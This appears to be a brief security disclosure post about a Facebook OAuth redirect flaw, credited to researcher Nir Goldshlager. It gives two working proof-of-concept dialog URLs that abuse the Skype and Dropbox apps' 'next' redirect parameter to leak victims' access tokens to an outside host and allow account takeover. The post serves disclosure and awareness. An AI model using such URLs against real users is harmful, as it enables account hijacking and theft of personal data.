Continuing hacking method used in last two oAuth flaws (mentioned here), this time attack is trying to use app redirection flaw in “redirect_uri, next” parameter to steal the access_token of facebook users.
POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1
POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1
The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over victim's account remotely without knowing their passwords.
Note: Flaw was reported to Facebook security team by Nir Goldshlager and but can't be fixed by Facebook team itself. Because app developers are responsible for aap programming mistakes, so issue is still unfix for other million apps.